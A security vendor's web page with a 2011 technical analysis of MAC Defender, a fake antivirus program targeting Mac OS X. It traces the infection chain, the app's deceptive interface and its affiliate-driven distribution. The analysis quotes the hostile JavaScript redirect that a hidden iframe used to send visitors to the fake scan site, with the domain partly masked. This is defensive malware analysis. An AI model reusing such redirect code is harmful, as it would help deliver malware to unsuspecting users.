SecureMac.com
About SecureMac Advertise Security Consulting Mac Security Store Send Feedback

Site Information
Site Background
Who runs the site
Advertising
Security Consulting
Employment/Jobs
Feedback Form

SecureMac Software
PrivacyScan

 

Mac OS X Security
sudo buffer overflow exploit + fix
Disable Single User Boot Mode
Malevolence - Dumping Passwords
nidump security
Startup Security - Open Firmware Password Protection

Mac OS X Network Security
SAINT
Secure FTP Wrapper
Ettercap - sniffer interceptor logger
Snort - Network Intrusion Detection System
SSH Admin
SSH Helper
xnu - enable MAC Address spoofing


Mac OS X Virus

Mac OS X Firewalls
Firewalk Firewall Utility
NetBarrier X

Mac OS X App Sec.

Mac OS X Encryption
LittleSecrets
GPGMail - PGP Functionality

Mac OS X DoS

SecureMac Library
Mac Cable Modem Security
Mac Security Auditing
Mac OS X Security Understanding
Mac OS X Security Second Lessons
Mac OS X Security Third Lesson
Mac OS X Single User Mode Root Access
Mac OS X Shareware Firewalls
Mac OS X Secure Installation
Cable & DSL Connections - Security Measures
Better Safe than Sorry
Apple.com Security Resources
Marketing Macintosh Security Programs

MAC Defender Technical Analysis

 

Posted: May 2nd, 2011

Security Risk: Low

RELATED: MAC Defender Security Bulletin & Removal Instructions
PDF: http://www.securemac.com/pdf/macdefender.pdf

As noted in our security advisory at http://www.securemac.com/MAC-Defender-Rouge-Anti-Virus-Analysis-Removal.php there is a new piece of malware in the wild that is targeting computers running OS X. The following is a technical analysis of the malware sample that we analyzed; this analysis assumes familiarity with our original security advisory.

While this particular piece of malware is new to OS X, it follows the general modus operandi of most fake anti-virus programs that target Microsoft Windows. First, the user is presented with a fake anti-virus scanning screen when they click through to a link serving the malware. In the case of the variant that we analyzed, the initial link to the malware was discovered with a Google Image Search for "free piranha picture" (without the quotation marks). At that time, the first hit for the search results showed an image from http://www.***piranha.com/wp-content/uploads/images2/piranha.jpg, while the actual link went to http://***books.com.br/piranha-attack-pictures which contained a hidden iframe with the following javascript:

<script>var url = "http://********.cz.cc/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword=default";
if (window!=top) {top.location.href = url;} else document.location= url;
</script>

This script causes the fake virus scan webpage to appear, in this case it was http://****-antivirus.cz.cc/fast-scan2/

Although the fake virus scan webpage was set up to look like Microsoft Windows, the site checks the User Agent for the web browser to determine which operating system to target, and serves up the appropriate installer. During our analysis, the installer came from http://dl.****-antivirus.cz.cc/BestMacAntivirus2011.mpkg.zip. From our initial research, there were a wide variety of these "antivirus" domains, all with different prefixes based on existing antivirus programs. Going to "/fast-scan/" rather than "/fast-scan2/" on the domains we tested resulted in only the .exe installer targeting Microsoft Windows being downloaded, regardless of the User Agent for the web browser. This indicates that the inclusion of an installer targeting computers running Mac OS X is a relatively recent development (along with the fact that the fake scan page is still set up to look like Microsoft Windows). Various posts on discussion boards reinforce this hypothesis, as complaints regarding the Windows variant of this piece of malware go back a few months, while the references to a Mac version are more recent.

Once the user has been tricked into installing the malware, it starts up as a "faceless" OS X application without an icon in the Dock. It additionally adds itself as a menu bar item, much like Airport menu bar item in OS X, and sets itself up as a login item. If the user clicks the red "Close" button on the interface window for the malware, it simply hides itself from view, and does not actually exit. At this time it is still visible in the process list as "MacDefender."

The actual user interface for the malware is quite convincing, and appears to be a legitimate antivirus program at first glance.

ABout MAC Defender

Some real time and thought went into the user interface for this program, which has not previously been the case for cross-platform infectors in the past. This sophistication adds credence to the idea that OS X is now being more heavily targeted than in the past. Along with the well-designed user interface, the "subscription" website that is displayed when the user tries to register the program is equally attractive, without the common misspellings and other issues normally present on malware sites trying to bilk the infected user.

MAC Defender Order

An amusing aspect of the user interface can be found in the "Running Processes" list located in the "System Info" section of the program. Although the MacDefender process is listed, the developers made sure the "kill" button has no effect when this process is selected, so the user cannot even use this function of the malware to escape the program!

Process List

The binary itself has a bundle identifier of 'com.alppe.md.plist,' contains references to a Russian project language, and appears to have been created with Xcode 3.2.6. The binary reveals references to a number of pornographic websites, which are randomly displayed if the user has not purchased a "subscription" for the malware.

Sites

The binary and associated files additionally show evidence that an affiliate program is present for the malware, which would indicate the possibility that there is an underlying market for the distribution of MAC Defender. The presence of an affiliate network behind the spread of this malware indicates a strong financial component associated with this new threat, and could be a harbinger to monetary gain as the continued primary goal of Mac malware development in the future.

Although it appears that this particular piece of malware is new to the Mac platform, we expect that further variants will appear in the future as this malware evolves.

Analysis by Nicholas Ptacek
SecureMac.com, Inc. ©



Security + OS
DiskLock
PowerBook Security Control Panel
Empower Pro
FileGuard
FreeGuard
FoolProof
Deus Lock Master
OnGuard
Keys Off
LockOut
MacOS Algorithm
Modem Security
Password Key
PGPuam
PPF
Shift Key Suite
Stealth Signal
SuperLock Lite
SuperLock Pro
Web-Confidential


Macintosh Viruses
Disinfectant
Sophos Anti-Virus
Norton AntiVirus
Nav 7 Nav 6 Nav X
Virex - Oct
VirusBarrier - Netupdate
vScan - Discontinued.

Mac Physical Security


Macintosh Firewalls
DoorStop Firewall
Firewall Q & A
IPNetSentry
NetBarrier
Norton Personal Firewall

Mac Spyware & Privacy
Monitorer
NetShred - Delete Files Safely

Network Security
MacAnalysis
Oyabun Tools
WDTech RAE
ToolDaemon

Application Security Issues
AIM - AOL Instant Messenger
Back Orifice
Eudora E-Mail Client
Internet Configure
IE 5.1, OE 5.1, Powerpoint, Excel Vulnerability
MS Personal webServer
NetBus
Outlook Express 4.5 Password Flaw
SubSeven
Sub7ME Server

Resource Info
AppleShare Server Info

Mac OS Encryption
EnScript
FGP
FileTwister
ForgotIt?
GenPass
MacLockSmith
My-Privacy
My Secret
PGPi
PGPhone
PGP Personal
PGP Freeware
PowerCrypt-dev
Private File
Quick Encrypt
SubRosa Utilities
Tresor

Deleting Files
Eraser Pro
ShredIt

Backups

Apple Hardware

MacOS DoS
Mac Attack


All material (c) 2014 SecureMac.com and respected owners